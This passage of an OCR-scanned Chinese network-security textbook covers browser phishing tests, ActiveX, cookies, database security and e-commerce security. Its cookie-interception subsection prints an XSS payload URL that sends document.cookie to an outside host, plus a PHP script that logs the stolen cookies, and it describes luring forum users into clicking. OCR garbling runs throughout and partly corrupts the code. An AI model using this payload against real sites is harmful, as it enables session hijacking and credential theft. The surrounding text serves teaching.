测试 过 程 共 进 行 了 220918 个 社会 工程 恶意 软件 和 78921 个 钓鱼 攻击 网 站 ,而 最 终 , 微 
软 Edge 成 功 识别 出 了 其 中 91. 4% 的 钓鱼 网 站 ,并 且 组 织 了 99% 的 SEM 样本 ,成 为 最 安全 
的 浏览 器 。 而 谷歌 Chrome 甄别 出 82. 4% 的 钓鱼 网 站 和 阻止 85. 8% 的 SEM 样本 ,位 居 第 二 。 
而 火狐 浏览 器 则 是 甄别 了 81. 4% 的 钓鱼 网 站 ,阻止 了 78.3% 的 SEM 样本 最 终 位 居 第 三 位 。 

此 次 测试 虽然 只 选取 了 三 款 主 流 浏览 器 ,但 是 微软 Edge 的 领先 优势 十 分 突出 。 在 安全 
性 方面 ,通过 此 次 测试 ,Edge 浏览 器 比 原来 的 IE 浏览 器 大 为 提高 。 

浏览 器 主要 应 该 有 过 滤 恶 意 网 站 和 隐私 保护 能 力 。 保 护 计算 机 安全 不 能 仅仅 依靠 系统 
本 身 和 杀毒 软件 。 面 对 日 益 增多 的 攻击 ,浏览 器 正成 为 黑客 们 进攻 的 突破 口 。 所 以 ,为 了 确 
保安 全 ,用 户 应 该 做 到 以 下 几 点 。 

(1) 及 时 升级 到 最 新 版 本 ,修补 已 知 的 安全 漏洞 。 

(2) 启动 安全 设置 功能 ,根据 用 户 习惯 ,选择 合适 的 安全 级 别 。 

(3) 谨防 来 源 不 明 的 电子 邮件 和 网 站 地 址 ,保持 较 高 警惕 性 。 


PP 7.4.2 ActiveX 的 安全 性 


ActiveX 是 一 个 开放 的 集成 平台 ,为 开发 人 员 、 用 户 和 Web 生产 商 提供 了 一 个 快速 而 简 
便 的 在 Internet 和 Intranet 创建 程序 集成 和 内 容 的 方法 。 使 用 ActiveX, 可 轻松 方便 地 在 
Web 页 中 插入 多 媒体 效果 、 交 互 式 对 象 以 及 复杂 程序 等 。ActiveX 脚本 支持 最 常用 脚本 语 
言 ,包括 Microsoft Visual Basic 脚本 和 JavaScript。ActiveX 脚本 可 用 于 集成 行为 若干 
ActiveX 控件 或 Java 小 程序 从 Web 浏览 器 或 服务 器 .扩展 其 功能 。 


@ 一 -一 
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当 通 过 Internet 发 行 软件 时 ,软件 的 安全 性 是 一 个 非常 引 人 注 意 的 问题 ,IE 浏览 器 通过 
以 下 的 方式 来 保证 ActiveX 插件 的 安全 。 

(1) ActiveX 使 用 了 两 个 补充 性 的 策略 : 安全 级 别 和 证 明 , 来 追求 进一步 的 软件 安 
全 性 。 

(2) Microsoft 提供 了 一 套 工 具 , 可 以 用 它 来 增加 ActiveX 对 象 的 安全 性 。 

(3) 通过 Microsoft 的 验证 代码 工具 ,可 以 对 ActiveX 控件 进行 签名 ,可 以 告诉 用 户 , 没 
有 他 人 算 改 过 这 个 控件 。 

为 了 使 用 验证 代码 工具 对 组 件 进行 签名 ,必须 从 证 书 授权 机 构 获 得 一 个 数字 证 书 。 证 
书包 含 表 明 特 定 软件 程序 是 正版 的 信息 ,这 确保 了 其 他 程序 不 能 再 使 用 原 程 序 的 标识 。 证 
书 还 记录 了 颁发 日 期 。 当 用 户 试 图 下 载 软件 时 ,Internet Explorer 会 验证 证 书 中 的 信息 ,以 
及 当前 日 期 是 否 在 证 书 的 截止 日 期 之 前 。 如 果 在 下 载 时 该 信息 不 是 最 新 的 和 有 效 的 ， 
Internet Explorer 将 显示 一 个 警告 。 

(4) 在 IE 默认 的 安全 级 别 中 ,ActiveX 控件 安装 之 前 ,用 户 可 以 根据 自己 对 软件 发 行商 
和 软件 本 身 的 信任 程度 ,选择 决定 是 否 继续 安装 和 运行 此 软件 。 

ActiveX 控件 有 较 强 的 功能 ,但 也 存在 被 人 利用 的 隐患 ,网 页 中 的 恶意 代码 往往 就 是 利 
用 这 些 控件 编写 的 小 程序 ,只 要 打开 网 页 就 会 被 运行 。 所 以 要 避免 恶意 网 页 的 攻击 只 有 禁 
止 这 些 恶 意 代 码 的 运行 。 

IE 对 此 提供 了 多 种 选择 ,具体 设置 步骤 是 : 选择 “工具 ”一 “Internet 选项 ”一 “安全 ”一 
“ 自 定义 级 别 ?选项 ,建议 用 户 将 ActiveX 控件 与 相关 选项 禁用 。 

另外 ,在 正 的 安全 性 设 定 中 用 户 只 能 设 定 Internet\ 本 地 Intranet` 受 信任 的 站 点 、 受 限制 的 
站 点 。 不 过 ,微软 在 这 里 隐藏 了 “我 的 电脑 "的 安全 性 设 定 ,通过 修改 注册 表 把 该 选项 打开 
(HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\CurrentVersion \InternetSettings\ 
Zones\0, 在 右边 窗口 中 找到 DWORD 值 Flags, 默 认 键 值 为 十 六 进 制 的 21, 十 进 制 的 33, 双 
击 Flags 选项 ,在 弹出 的 对 话 框 中 将 它 的 键 值 改 为 1 即 可 ), 可 以 使 在 对 待 ActiveX 控件 时 有 
更 多 的 选择 ,并 对 本 地 计算 机 安全 产生 更 大 的 影响 。 


j* 7.4.3 Cookie 的 安全 性 


Cookie 有 时 也 用 其 复数 形式 Cookies, 指 某 些 网 站 为 了 辨别 用 户 身份 、 进 行 Session 跟 
踪 而 储存 在 用 户 本 地 终端 上 的 数据 。Cookie 是 在 HTTP 协议 下 ,服务 器 或 脚本 可 以 维护 客 
户 工作 站 上 信息 的 一 种 方式 。Cookie 是 由 Web 服务 器 保存 在 用 户 浏 览 器 (客户 端 ) 上 的 小 
文本 文件 , 它 可 以 包含 有 关 用 户 的 信息 。 无 论 何 时 用 户 链接 到 服务 器 , Web 站 点 都 可 以 访问 
Cookie 信息 。Cookie 的 使 用 可 能 会 对 网 络 用 户 的 隐私 构成 了 危害 。 

Cookie 的 目的 是 为 用 户 带 来 方便 ,为 网 站 带 来 增值 ,一 般 情况 下 不 会 造成 严重 的 安全 威 
胁 。Cookie 文件 不 能 作为 代码 执行 ,也 不 会 传送 病毒 , 它 为 用 户 所 专 有 并 只 能 由 创建 它 的 服 
务 器 来 读 取 。 另 外 ,浏览 器 一 般 只 允许 存放 300 个 Cookie, 每 个 站 点 最 多 存放 20 个 Cookie， 
每 个 Cookie 的 大 小 限制 为 4KB, 因 此 ,Cookie 不 会 塞 满 硬盘 ,更 不 会 被 用 作 “ 拒 绝 服务 ”攻击 
手段 。 但 是 ,Cookie 作为 用 户 身 份 的 替代 .其 安全 性 有 时 决定 了 整个 系统 的 安全 性 ,Cookie 
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的 安全 性 问题 不 容 忽视 。 

1) Cookie 欺骗 

Cookie 记录 了 用 户 的 账户 ID 密码 之 类 的 信息 ,通常 使 用 MD5 方法 加 密 后 在 网 上 传 
递 。 经 过 加 密 处 理 后 的 信息 即使 被 网 络 上 一 些 别 有 用 心 的 人 截获 也 看 不 懂 。 然 而 ,现在 存 
在 的 问题 是 ,截获 Cookie 的 人 不 需要 知道 这 些 字 符 串 的 含义 ,只 要 把 别人 的 Cookie 向 服务 
器 提交 ,并 且 能 够 通过 验证 ,就 可 以 冒充 受害 人 的 身份 登录 网 站 ,这 种 行为 叫 作 Cookie 
欺骗 。 

非法 用 户 通 过 Cookie 欺骗 获得 相应 的 加 密 密 钥 ,从 而 访问 合法 用 户 的 所 有 个 性 化 信 
息 , 包 括 用 户 的 E-mail 甚至 账户 信息 ,对 个 人 信息 造成 严重 危害 。 对 前 面 介 绍 的 XSS 攻击 ， 
最 基本 的 XSS 跨 站 攻击 方法 就 是 窃取 受害 者 Cookie 信息 ,如 图 7-31 所 示 。 
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图 7-31 XSS 窃取 受害 者 Cookie 信息 的 原理 


2) Cookie 截获 

Cookie 以 纯 文 本 的 形式 在 浏览 器 和 服务 器 之 间 传 送 ,很 容易 被 他 人 非法 截获 和 利用 。 
任何 可 以 截获 Web 通信 的 人 都 可 以 读 取 Cookie。 

Cookie 被 非法 用 户 截获 后 ,然后 在 其 有 效 期 内 重 放 , 则 此 非法 用 户 将 享有 合法 用 户 的 权 
益 。 例 如 ,对 于 在 线 阅读 ,非法 用 户 可 以 不 支付 费用 即 可 享受 在 线 阅读 电子 杂志 。 

Cookie 截获 的 手段 如 下 。 

(1) 用 编程 手段 截获 Cookie。 下 面 分 析 其 手法 ,该 方法 分 两 步 完 成 。 

@ 定位 需要 收集 Cookie 的 网 站 ,对 其 进行 分 析 并 构造 URL。 首 先 打开 要 收集 Cookie 
的 网 站 ,这 里 假设 是 http://www. XXX. net, 登 录 网 站 输入 用 户 名 "二 Al 二 "(不 含 引 号 ), 对 
数据 进行 分 析 抓 包 ,得 到 如 下 代码 。 


http://www. XXX. net/tX1/login/login. pl?username =<Al> gpasswd = &ok.X= 28&ok. y= 6; 
将 其 中 "一 Al 二 "更 换 为 : 
"< script > alert(document. cookie)</script >" 再 试 , 如 果 执 行 成 功 , 就 开始 构造 URL: 
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http://www. XXX. net/tX1/login/login. pl? username = < script > window. open ( " http://www. 

cbifamily. org/cbi. php?" % 2bdocument. cookie)</script > &passwd = &ok. X= 28&ok.Y= 6. 

其 中 ,http://www. cbifamily. org/cbi. php 是 用 户 能 够 控制 的 某 台 主机 上 的 一 个 脚本 。 
需要 注意 的 是 %2b 为 符号 “十 "的 URL 编码 ,因为 “十 ”将 被 作为 空格 处 理 。 该 URL 即 可 在 
论坛 中 发 布 , 诱 使 别人 单 击 。 

@ 编制 收集 Cookie 的 PHP 脚本 ,并 将 其 放 到 用 户 可 以 控制 的 网 站 上 , 当 不 知情 者 单 击 
了 构造 的 URL 后 可 以 执行 该 PHP 代码 。 该 脚本 的 具体 内 容 如 下 。 

<?php 

$ info = getenv("OUERY STRING" ); 

if( $ info){ 

$ fp= fopen("info. tXt", "a"); 
fwrite( $ fp, ! info. "\n"); 
fclose( $ fp); 

eee nent/ net"); 

?> 

将 这 段 代码 放 到 网 络 里 , 则 能 够 收集 所 有 人 的 Cookie。 如 果 一 个 论坛 允许 HTML 代码 
或 者 允许 使 用 Flash 标签 ,就 可 以 利用 这 些 技 术 收 集 Cookie 的 代码 放 到 论坛 里 ,然后 给 帖子 
取 一 个 吸引 人 的 主题 , 写 上 有 趣 的 内 容 , 很 快 就 可 收集 到 大 量 的 Cookie。 在 论坛 上 ,有 许多 
人 的 密码 就 是 被 这 种 方法 盗 走 的 。 

(2) 利用 Flash 的 代码 隐患 截获 Cookie。Flash 中 有 一 个 getURL() 函数 。Flash 可 以 
利用 这 个 函数 自动 打开 指定 的 网 页 , 它 可 能 把 用 户 引 向 一 个 包含 恶意 代码 的 网 站 。 例 如 , 当 
用 户 在 计算 机 上 欣赏 Flash 动画 时 ,动画 帧 里 的 代码 可 能 已 经 悄悄 地 连 上 网 ,并 打开 了 一 个 
极 小 的 包含 有 特殊 代码 的 页 面 ,这 个 页 面 可 以 收集 Cookie、 也 可 以 做 一 些 其 他 有 害 的 事情 。 
网 站 无 法 禁止 Flash 的 这 种 作为 ,因为 这 是 Flash 文件 的 内 部 功能 。 

(3) Cookie 泄露 网 络 隐私 。Cookie 导致 网 络 隐私 泄密 的 主要 原因 是 商业 利益 驱动 。 随 
着 电子 商务 的 兴起 和 互联 网 上 巨大 商机 的 出 现 , 一 些 网 站 和 机 构 滥 用 Cookie, 未 经 访问 者 的 
许可 ,利用 搜索 引擎 技术 、 数 据 挖掘 技术 甚至 是 网 络 欺骗 技术 收集 他 人 的 个 人 资料 ,达到 构 
建 用 户 数据 库 发 送 广告 等 营利 目的 ,造成 用 户 个 人 隐私 的 泄露 。Cookie 信息 传递 的 开放 
性 。Cookie 文件 具有 特殊 的 传递 流程 和 文本 特性 ,在 服务 器 和 客户 端 之 间 传 送 未 经 安全 加 
密 的 Cookie 文件 , 易 导 致 个 人 信息 的 泄露 。 


BRE 数据 库 的 安全 性 


网 络 系 统 中 最 重要 、 最 有 价值 的 是 存储 在 数据 库 中 的 数据 资源 ,网 络 安全 的 关键 及 核心 
是 其 数据 安全 。 在 现代 信息 化 社会 ,数据 库 技术 已 经 成 为 信息 化 建设 和 信息 资源 共享 的 关 
键 ,数据 库 是 各 种 重要 数据 处 理 和 存储 的 核心 ,数据 库 技术 的 广泛 应 用 ,也 带 来 了 安全 风险 。 
利用 数据 库 安全 技术 ,可 以 提高 数据 库 系 统 安全 和 业务 数据 的 安全 。 
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j> 7.5.1 数据 库 安 全 的 威胁 和 隐患 


由 1. 数据 库 安 全 的 主要 威胁 


数据 库 安 全 的 主要 威胁 包括 以 下 内 容 。 

(1) 法 律 法 规 、 社 会 伦理 道德 和 宣传 教育 滞后 或 不 完善 等。 

(2) 现行 的 政策 ,规章 制度 .人 为 及 管理 出 现 问题 。 

(3) 硬件 系统 或 控制 管理 问题 ,如 CPU 是 否 具备 安全 性 方面 的 特性 。 

(4) 实体 (物理 ) 安 全 ,包括 服务 器 .计算 机 或 外 设 、 网 络 设备 等 安全 及 运行 环境 安全 。 

(5) 操作 系统 及 数据 库 管理 系统 DBMS 的 漏洞 与 风险 等 安全 性 问题 。 

(6) 可 操作 性 问题 ,车 某 个 密码 方案 被 采用 , 则 密码 自身 的 安全 性 有 问题 。 

(7) 数据 库 系统 本 身 的 漏洞 .缺陷 和 隐患 带 来 的 安全 性 问题 。 

畏 注 意 : 实际 上 ,鉴于 开放 的 计算 机 网 络 和 数据 库 系统 的 自身 特点 ,大 量 重要 数据 资源 
集中 存放 并 为 广大 用 户 共享 使 用 ,导致 出 现 数据 库 的 安全 威胁 和 隐患 风险 。 


有 2 数据 库 系统 缺陷 及 隐患 


常见 数据 库 的 安全 缺陷 和 隐患 原因 分 析 , 主 要 包括 以 下 8 个 方面 。 

51) 数据 库 应 用 程序 的 研发 .管理 和 维护 等 漏洞 或 人 为 疏忽 。 

(2) 用 户 对 数据 库 安全 的 忽视 ,安全 设置 和 管理 失当 。 

(3) 数据 库 账 号 、 密 码 容易 泄露 和 破译 。 

(4) 操作 系统 后 门 及 漏洞 隐患。 

(5) 社交 工程 。 攻 击 者 使 用 模仿 网 站 等 欺诈 “钓鱼 "技术 ,致使 用 户 不 经 意 间 提交 泄露 
账号 密码 等 机 密 信息 。 网 络 服务 商 应 通过 适时 地 检测 可 疑 事件 活动 ,减轻 网 络 钓鱼 攻击 的 
影响 。 

(6) 部 分 数据 库 机 制 威胁 网 络 低层 安全 。 

(7) 系统 安全 特性 自身 存在 的 缺陷 和 不 足 。 

(8) 网 络 协议 ,计算 机 病毒 及 运行 环境 等 其 他 威胁 。 

固 注 意 : 发 生 数 据 泄密 事件 大 多 与 网 络 病毒 有 关 ,特别 是 “轮流 "木马 病毒 ,其 窍 密 手 自 
非常 隐藏 ,用 户 在 不 经 意 间 极 易 造成 泄密 。 


上 3. 数据 库 安全 的 层次 结构 


数据 库 安全 的 层次 结构 ,包括 以 下 5 个 方面 。 

(1) 物理 层 。 计 算 机 网 络 系统 的 最 外 层 最 容易 受到 攻击 和 破坏 ,主要 侧重 保护 计算 机 
网 络 系统 、 网 络 链 路 及 其 网 络 节点 等 物理 (实体 ) 安 全 。 

(2) 网 络 层 。 网 络 层 安全 性 和 物理 层 安全 性 一 样 极为 重要 ,由 于 所 有 计算 机 网 络 数据 
库 系统 都 允许 通过 网 络 进行 远程 访问 ,所 以 ,更 需要 做 好 安全 保障 。 
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(3) 操作 系统 层 。 操 作 系 统 在 数据 库 系统 中 ,与 DBMS 交互 并 协助 控制 管理 数据 库 。 
操作 系统 安全 漏洞 和 隐患 将 成 为 对 数据 库 进行 攻击 和 非 授权 访问 的 最 大 威胁 与 隐患 。 

(4) 数据 库 系统 层 。 包 括 DBMS 和 各 种 业务 数据 库 等 ,数据 库存 储 着 重要 程度 和 敏感 
程度 不 同 的 各 种 业务 数据 ,并 通过 计算 机 网 络 为 不 同 授权 的 用 户 所 共享 ,数据 库 系 统 必 须 采 
取 授 权限 制 ,访问 控制 .加密 和 审计 等 安全 措施 。 

(5) 应 用 层 。 主 要 侧重 用 户 权限 管理 .身份 验证 及 访问 控制 等 ,防范 非 授权 用 户 以 各 种 
方式 对 数据 库 及 数据 的 攻击 和 非法 访问 ,也 包括 各 种 越权 访问 等 。 


”7.5.2 数据 库 安 全 的 体系 和 机 制 


由 1. 数据 库 安 全 的 概念 


数据 库 安 全 (DataBase Security) 是 指 采取 各 种 安全 措施 对 数据 库 及 其 相关 文件 和 数据 
进行 保护 。 数 据 库 安全 包括 数据 库 本 身 的 安全 和 其 中 数据 的 安全 。 数 据 库 系统 性 能 的 重要 
指标 之 一 是 确保 系统 安全 运行 和 数据 的 安全 ,以 各 种 防范 措施 防止 用 户 非 授权 或 越权 使 用 
数据 库 ,主要 通过 数据 库 管理 系统 CDBMS) 实 现 的 。 数 据 库 系统 中 一 般 采 用 用 户 标识 和 鉴 
别 . 存 取 控制 .视图 以 及 密码 存储 等 技术 进行 安全 控制 。 

数据 库 安 全 的 核心 和 关键 是 其 数据 安全 。 数 据 安 全 (Data Security) 是 指 以 保护 措施 确 
保 数 据 的 完整 性 ,保密 性 、 可 用 性 、 可 控 性 和 可 审查 性 。 由 于 数据 库存 储 着 大 量 的 重要 信息 
和 机 密 数据 ,而 且 在 数据 库 系统 中 大 量 数 据 集 中 存放 , 供 广 大 用 户 共享 ,因此 ,必须 加 强 对 数 
据 库 访问 的 控制 和 数据 安全 防护 。 

数据 库 系统 安全 (DataBase System Security) 是 指 为 数据 库 系统 采取 的 安全 保护 措施 ， 
防止 系统 软件 和 其 中 数据 不 遭 到 破坏 、 更 改 和 泄露 。 


有 2 数据库 及 数据 的 完整 性 


1) 数据 库 完 整 性 

数据 库 完整 性 (DataBase Integrity) 是 指 其 中 数据 的 正确 性 和 相 容 性 。 实 际 上 以 各 种 完 
整 性 约束 做 保证 ,数据 库 完整 性 设计 是 数据 库 完整 性 约束 的 设计 。 可 以 通过 DBMS 或 应 用 
程序 实现 数据 库 完 整 性 约束 ,基于 DBMS 的 完整 性 约束 以 模式 的 一 部 分 存 人 数据 库 中 。 数 
据 库 完整 性 对 于 数据 库 应 用 系统 至 关 重 要 ,其 主要 作用 体现 在 以 下 4 个 方面 。 

(1) 可 以 防止 合法 用 户 向 数据 库 中 添加 不 合 语义 的 数据 。 

(2) 利用 基于 DBMS 的 完整 性 控制 机 制 实现 业务 规则 ,易于 定义 和 理解 ,而 且 可 以 降低 
应 用 程序 的 复杂 性 ,并 提高 应 用 程序 的 运行 效率 。 同 时 ,基于 DBMS 的 完整 性 控制 机 制 在 
于 集中 管理 , 比 应 用 程序 更 容易 实现 数据 库 的 完整 性 。 

(3) 合理 的 数据 库 完整 性 设计 ,可 协调 兼顾 数据 库 的 完整 性 和 系统 效能 。 如 加 载 大 量 
数据 时 ,只 在 加 载 之 前 临时 使 基于 DBMS 的 数据 库 完整 性 约束 失效 ,完成 加 载 后 再 使 其 生 
效 , 既 不 影响 数据 加 载 的 效率 又 能 保证 数据 库 的 完整 性 。 

(4) 完善 的 数据 库 完 整 性 在 应 用 软件 的 功能 测试 中 ,有 助 于 尽早 发 现 应 用 软件 的 错误 。 
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数据 库 完整 性 约束 可 分 为 6 类 : 列 级 静态 约 东 ,元 组 级 静态 约束 、 关 系 级 静态 约束 、 列 
级 动态 约束 元 组 级 动态 约束 、 关 系 级 动态 约束 。 动 态 约 束 通常 由 应 用 软件 进行 实现 ,不 同 
DBMS 支持 的 数据 库 完 整 性 基本 相同 。 

2) 数据 完整 性 

数据 完整 性 是 指数 据 的 精确 性 (Accuracy) 和 可 靠 性 (Reliability)。 主 要 包括 数据 的 正 
确 性 有 效 性 和 一 致 性 。 正 确 性 是 指数 据 的 输入 值 与 数据 表 对 应 域 的 类 型 相同 ; 有 效 性 是 
指数 据 库 中 的 理论 数值 满足 现实 应 用 中 对 该 数值 段 的 约束 ; 一 致 性 是 指 不 同 用 户 使 用 的 同 
一 数据 完全 相同 。 

数据 完整 性 分 类 为 4 种: 实体 完整 性 (Entity Integrity) 、 域 完整 性 (Domain Integrity) 、 
参照 完整 性 (Referential Integrity) ,用户 定义 完整 性 (User-defined Integrity) 。 

数据 库 采 用 多 种 方法 保证 数据 完整 性 ,包括 外 键 、 约 束 、 规 则 和 触发 器 。 


lls. 数据 库 安全 体系 与 防护 


数据 库 系 统 的 安全 不 仅 依赖 自身 内 部 的 安全 机 制 ,还 与 外 部 网 络 环境 ,应 用 环境 、 从 业 
人 员 素 质 等 因素 相关 ,数据 库 安全 体系 与 防护 对 于 网 络 数 据 库 系统 的 安全 极为 重要 。 

1) 数据 库 的 安全 体系 

数据 库 系统 的 安全 体系 框架 划分 为 3 个 层次 : 网 络 系统 层 、 宿 主 操作 系统 层 和 数据 库 
管理 系统 层 , 一 起 构成 数据 库 系 统 的 安全 体系 。 

2) 数据 库 的 安全 防护 

网 络 数据 库 的 主要 体系 为 多 级 .互联 和 安全 级 别 差异 ,其 安全 性 不 仅 关系 到 数据 库 之 间 
的 安全 ,而 且 关 系 到 一 个 数据 库 中 多 级 功能 的 安全 性 。 通 常 ,侧重 考虑 两 个 层面 : 四 外 围 层 
的 安全 , 即 操作 系统 ,传输 数据 的 网 络 、Web 服务 器 以 及 应 用 服务 器 的 安全 ; @ 数 据 库 核 心 
层 的 安全 , 即 数 据 库 本 身 的 安全 。 

(1) 操作 系统 安全 。 操 作 系 统 是 大 型 数据 库 系统 的 运行 平台 ,为 数据 库 系统 提供 运行 
支撑 性 安全 保护 。 

(2) 服务 器 及 应 用 服务 器 安全 。 

(3) 传输 安全 。 是 指 保护 网 络 数 据 库 系统 内 传输 的 数据 安全 。 

(4) 数据 库 管理 系统 安全 。 

(5) 数据 库 加 密 。 网 络 系统 中 的 数据 加 密 是 数据 库 安 全 的 核心 问题 。 

(6) 数据 分 级 控制 。 由 数据 库 安 全 性 要 求 和 存储 数据 的 重要 程度 ,应 对 不 同安 全 要 求 
的 数据 实行 一 定 的 级 别 控制 ,避免 非法 的 信息 流动 。 

(7) 数据 库 的 备份 与 恢复 。 备 份 与 恢复 可 解 应 急 之 需 。 

(8) 网 络 数据 库 的 容 灾 系统 设计 。 可 保证 数据 安全 及 系统 正常 运行 。 

数据 库 安全 还 包括 数据 加 密 和 安全 审计 等 过 程 ,但 一 般 用 户 一 定 要 学 会 运用 “数据 库 的 
备份 与 恢复 ”功能 。 
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| 7.6 ”电子 商务 的 安全 性 | 电子 商务 的 安全 性 


构建 安全 可 靠 的 电子 商务 运营 及 应 用 环境 ,已 经 成 为 电子 商务 企业 与 消费 者 共同 关注 
的 重要 热点 问题 。 实 际 上 ,解决 电子 商务 安全 问题 也 是 网 络 安全 技术 的 一 项 综合 应 用 。 


PP 7.6.1 电子 商务 安全 概述 





1. 电子 商务 安全 的 概念 


电子 商务 安全 是 指 利用 各 种 安全 措施 保障 电子 商务 过 程 的 安全 。 在 计算 机 网 络 安 全 的 
基础 上 ,保障 电子 商务 过 程 的 顺利 进行 。 即 实现 电子 商务 的 保密 性 、 完 整 性 、 可 鉴别 性 、 不 可 
伪造 性 和 不 可 抵赖 性 。 电 子 商 务 安全 性 不 仅 与 计算 机 系统 结构 有 关 , 还 与 电子 商务 应 用 的 
环境 、 人 员 素 质 和 社会 因素 有 关 , 电 子 商务 对 安全 的 基本 要 求 如 下 。 

(1) 授权 的 合法 性 。 安 全 管理 人 员 根 据 权 限 的 分 配 ,管理 用 户 的 各 种 操作 。 

(2) 不 可 抵赖 性 。 不 可 否认 已 进行 的 交易 行为 ,以 电子 记录 或 合同 代替 传统 交易 方式 。 

(3) 信息 的 保密 性 。 确 保 对 敏感 文件 ,信息 加 密 , 保 证 信用 卡 的 账号 和 密码 不 泄露 。 

(4) 交易 者 身份 的 真实 性 。 双 方 交 换 信息 之 前 获取 对 方 的 证 书 , 来 鉴别 对 方 身份 。 

(5) 信息 的 完整 性 。 避 免 信息 在 传输 过 程 中 出 现 丢 失 、 次 序 颠 倒 等 破坏 其 完整 性 的 
行为 。 

(6) 存储 信息 的 安全 性 。 包 括 机 密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 可 审查 性 。 

电子 商务 的 一 个 重要 技术 特征 是 利用 IT 技术 传输 和 处 理 商 业 信 息 。 电 子 商务 安全 从 
整体 上 可 分 为 两 大 部 分 : 计算 机 网 络 安全 和 商务 交易 安全 。 计 算 机 网 络 安全 与 商务 交易 安 
全 实际 上 是 密 不 可 分 的 ,两 者 相辅相成 , 缺 一 不 可 。 电 子 商 务 安全 具体 包括 5 个 方面 : 中 电 
子 商务 系统 硬件 (物理 ) 安 全 ; 加 电子 商务 系统 软件 安全 ; @ 电 子 商务 系统 运行 安全 ; @ 电 
子 商务 交易 安全 ; 回电 子 商务 安全 立法 。 电 子 商务 的 安全 问题 是 一 个 复杂 的 系统 问题 。 





12. 电子 商务 的 安全 威胁 


电子 商务 的 交易 双方 都 面临 着 安全 威胁 。 主 要 包括 以 下 几 个 方面 。 

1) 销售 企业 面临 的 威胁 

(1) 中 央 系 统 安全 性 被 破坏 。 破 坏 电 子 商务 系统 安全 体制 ,假冒 合法 用 户 算 改 数据 。 
(2) 竞争 者 检索 商品 递送 状况 。 以 冒充 等 非法 途径 收集 商品 营销 、 递 送 、 库 存 状况 。 
(3) 客户 资料 被 竞争 者 获取 。 通 过 各 种 非法 的 手段 ,获取 企业 的 客户 资料 等 商业 机 密 。 
(4) 被 他 人 假冒 而 损害 公司 的 信誉 。 

(5) 客户 即 消费 者 提交 订单 后 ,由 于 各 种 原因 可 能 没有 付款 。 

(6) 个 别 黑客 的 虚假 订单 或 虚假 客户 信息 。 

(7) 获取 他 人 的 机 密 数据 。 
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2) 消费 者 面临 的 安全 威胁 

通常 ,消费 者 通过 网 上 交易 面临 的 主要 安全 威胁 如 下 。 

(1) 虚假 订单 。 他 人 以 消费 者 的 名 义 假冒 购买 商品 ,而 要 求 消费 者 付款 或 返还 商品 。 

(2) 付款 后 不 能 收 到 商品 。 截 留 订 单 或 货款 ,使 客户 付款 后 得 不 到 商品 ,或 推迟 发 货 。 

(3) 机 密 性 丧失 。 信 用 卡 等 机 密 被 发 送 给 假冒 者 ,或 传输 中 被 窃取 、 泄 露 . 算 改 或 破坏 。 

(4) 拒绝 服务 。 向 商家 发 送 大 量 虚假 订单 或 请 求 , 致 使 合法 的 用 户 无 法 得 到 正常 服务 。 

3) 电子 商务 风险 及 安全 问题 

从 整个 电子 商务 系统 分 析 , 可 将 电子 商务 安全 问题 归结 为 四 类 风险 : 数据 传输 风险 、 信 
用 风险 ,管理 风险 和 法 律 方面 风险 。 电 子 商 务 的 安全 性 主要 包括 五 个 方面 : 系统 的 可 靠 性 、 
交易 的 真实 性 、 数 据 的 安全 性 数据 的 完整 性 ,交易 的 不 可 抵赖 性 。 商 务 安全 中 普遍 存在 着 
四 种 安全 风险 和 隐患 : 窃取 信息 、 自 改 信息 假冒 .恶意 破坏 。 

电子 商务 的 安全 交易 ,主要 需要 5 个 方面 的 保证 : 网 络 信息 的 机 密 性 、 完 整 性 (不 可 算 
改 )、 可 用 性 可 控 性 、 可 审查 性 (也 称 不 可 否认 性 )。 


上 3. 电子 商务 的 安全 要 素 


1) 电子 商务 的 安全 要 素 

通过 对 电子 商务 安全 问题 分 析 , 可 以 将 电子 商务 的 安全 要 素 概括 为 以 下 5 个 方面 。 

(1) 交易 数据 的 有 效 性 。 保 证 贸易 数据 在 确定 的 时 间 指定 的 地 点 为 有 效 的 。 

(2) 商业 信息 的 机 密 性 。 防 止 在 整个 电子 商务 交易 过 程 中 商业 信息 的 机 密 性 。 

(3) 交易 数据 的 完整 性 。 预 防 对 信息 的 随意 生成 , 算 改 和 删除 ,同时 要 防止 数据 传输 过 
程 中 信息 的 丢失 和 重复 ,并 保证 信息 传输 次 序 的 一 致 性 。 

(4) 商务 系统 的 可 靠 性 。 主 要 指 交易 者 身份 的 确定 和 交易 系统 本 身 的 安全 可 靠 性 。 

(5) 交易 的 可 审查 性 。 确 定 电子 合同 .交易 和 信息 的 可 靠 性 与 可 审查 性 ,并 预防 可 能 的 
否认 行为 的 发 生 , 不 可 抵赖 性 包括 : 源 点 防 抵赖 ,使 信息 发 送 者 事后 无 法 否认 发 送 了 信 
息 ; @ 接 收 防 抵赖 ,使 信息 收 方 无 法 抵赖 接收 到 了 信息 ; @ 回 执 防 抵赖 ,使 发 送 责任 回执 的 
各 个 环节 均 无 法 推卸 其 应 负 的 责任 。 

为 了 满足 电子 商务 的 安全 要 求 ,EC 系统 必须 利用 安全 技术 为 其 活动 参与 者 提供 可 靠 的 
安全 服务 ,主要 包括 : 鉴别 服务 .访问 控制 服务 .机 密 性 服务 不 可 否认 服务 等 。 

2) 电子 商务 的 安全 内 容 

电子 商务 的 安全 不 仅 是 狭义 上 的 网 络 安全 ,如 防 病毒 、 防 黑客 、 入 侵 检测 等 ,从 广义 上 还 
包括 信息 的 完整 性 以 及 交易 双方 身份 验证 的 不 可 抵赖 性 ,从 这 种 意义 上 来 说 ,电子 商务 的 安 
全 涵盖 面 比 一 般 的 网 络 安 全 要 广泛 得 多 ,从 整体 上 可 分 为 两 大 部 分 : 计算 机 网 络 安全 和 商 
务 交 易 安全 。 电 子 商 务 的 安全 主要 包括 以 下 4 个 方面 。 

(1) 网 络 安全 技术 。 主 要 包括 防火 墙 技 术 、 网 络 防毒 技术 、 加 密 技 术 、 密 钥 管 理 技术 、 数 
字 签 名 .身份 验 证 技术 .授权 、\ 访 问 控制 和 审计 等 。 

(2) 安全 协议 及 相关 标准 规范 。 电 子 商务 在 应 用 过 程 中 主要 的 安全 协议 及 相关 标准 规 
范 , 主 要 包括 网 络 安全 交易 协议 和 主要 的 安全 协议 标准 等 。 还 包括 安全 超 文本 传输 协议 
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(S-HTTP) 安全 套 接 层 协议 SSL、 安 全 交易 技术 协议 STT、 安 全 电子 交易 SET 协议 等 。 
(3) 大 力 加 强 安全 交易 监督 检查 ,健全 各 项 规章 制度 和 机 制 。 建 立交 易 的 安全 制度 、 交 
